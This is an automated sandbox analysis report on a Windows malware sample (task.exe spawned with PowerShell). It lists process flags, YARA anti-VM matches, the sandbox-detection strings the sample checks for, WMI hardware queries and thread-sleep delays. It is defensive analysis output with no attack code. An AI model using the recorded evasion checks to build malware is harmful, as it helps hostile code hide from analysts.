Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 9.2.task.exe.22ff1b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\task.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044	Thread sleep count: 6172 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044	Thread sleep count: 620 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 1964	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 1684	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2300	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\task.exe TID: 2128	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
